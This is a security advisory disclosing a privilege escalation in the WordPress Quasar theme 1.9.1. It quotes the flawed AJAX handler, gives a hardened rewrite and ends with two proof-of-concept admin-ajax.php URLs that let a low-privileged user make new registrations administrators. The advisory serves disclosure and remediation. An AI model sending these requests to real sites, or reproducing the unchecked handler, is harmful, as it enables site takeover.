WordPress Quasar Theme 1.9.1 Privilege Escalation

2015-02-02T00:00:00
ID PACKETSTORM:130200
Type packetstorm
Reporter Evex
Modified 2015-02-02T00:00:00

Description

------------------------------------------------------------------------------
WordPress Quasar Theme Privilege Escalation
------------------------------------------------------------------------------
  
  
[-] Theme Link:  
  
http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock  
  
  
[-] Affected Version:  
  
Version 1.9.1  
  
  
[-] Vulnerability Description:  
  
The vulnerable code is located in the /rock-builder/rock-builder-ui.php  
script:  
  
function rock_builder_save_template(){

    $data = $_REQUEST['data'];                      // attacker-controlled option value
    $template = $_REQUEST['template'];

    $templateName = $template['name'];
    $templateDBName = $template['database_name'];   // attacker-controlled option NAME
    update_option($templateDBName, $data);          // arbitrary write to wp_options: no capability check, no nonce, no allow-list

    $builderReferences = get_option("rock_builder_references",array());

    $i = 0;
    foreach($builderReferences as $ref){
        if($ref['database_name'] == $templateDBName){
            $builderReferences[$i]['name'] = $templateName;
            update_option("rock_builder_references",$builderReferences);
            //echo "FOUND";
            break;
        }
        $i++;
    }

    exit;
}
// wp_ajax_* hooks run for every authenticated user, regardless of role
add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");
  
The handler is registered on a wp_ajax_ hook, so any authenticated user
(a subscriber account is enough) can reach it through admin-ajax.php. It
performs no capability check and no nonce check, and it passes an
attacker-controlled option name and value straight to update_option(). That
is an arbitrary write to any row of wp_options: an attacker can change the
site's registration settings, make every newly registered account an
administrator, and take the site over completely.
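The following is a hardened rewrite of the handler, added here as an example; it is not code from the Quasar theme or its vendor. It assumes the builder UI sends a nonce created with wp_create_nonce('rock_builder_save') in a 'nonce' field (the action name is an assumption), and it restricts writes to option names the builder itself registered in rock_builder_references, which is what keeps template[database_name]=default_role from ever reaching update_option():

```php
<?php
// Added example, not the theme's own code: a hardened replacement for
// rock_builder_save_template() from rock-builder/rock-builder-ui.php.
// Assumptions: the builder UI emits wp_create_nonce('rock_builder_save')
// as a 'nonce' request field, and only users who may manage options are
// meant to save builder templates.

function rock_builder_save_template_hardened() {
    // 1. Authorization: the original runs for every logged-in user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 2. CSRF: a nonce bound to the current user. Dies with HTTP 403 if
    //    the 'nonce' field is missing or invalid ('rock_builder_save' is
    //    the assumed nonce action).
    check_ajax_referer( 'rock_builder_save', 'nonce' );

    $data     = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    $template = ( isset( $_POST['template'] ) && is_array( $_POST['template'] ) )
        ? wp_unslash( $_POST['template'] ) : array();

    $templateName   = isset( $template['name'] ) ? sanitize_text_field( $template['name'] ) : '';
    $templateDBName = isset( $template['database_name'] ) ? (string) $template['database_name'] : '';

    // 3. Allow-list: the option name must be one the builder registered
    //    itself. Arbitrary names such as default_role or users_can_register
    //    are rejected before any write happens.
    $builderReferences = (array) get_option( 'rock_builder_references', array() );
    $index = null;
    foreach ( $builderReferences as $i => $ref ) {
        if ( isset( $ref['database_name'] ) && $ref['database_name'] === $templateDBName ) {
            $index = $i;
            break;
        }
    }
    if ( null === $index ) {
        wp_send_json_error( 'unknown template', 400 );
    }

    update_option( $templateDBName, $data );
    $builderReferences[ $index ]['name'] = $templateName;
    update_option( 'rock_builder_references', $builderReferences );

    wp_send_json_success();
}
add_action( 'wp_ajax_rockAjax_save_builder_template', 'rock_builder_save_template_hardened' );
```

The three checks are independent and all three are needed: the capability check alone still leaves an administrator exposed to the CSRF variant, the nonce alone still lets a subscriber write options, and the allow-list is what removes the arbitrary-option-write primitive even if a future bug weakens the other two. On a site that ran the vulnerable version, the practical check is to inspect the default_role and users_can_register options (for example with `wp option get default_role`) and review the administrator list for accounts that registered after installation.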
  
  
[-] Proof of Concept:  
  
  
Requesting the URL below as any logged-in user sets the default role of
newly registered users to administrator (the attacker only needs one
low-privileged account on the site):
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_role

Requesting the URL below as a logged-in user enables user registration if it
was disabled. Because the handler has no nonce, the same request can also be
delivered as a link to a logged-in user or administrator (CSRF):
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_register

With both options set, registering a new account gives the attacker an
administrator.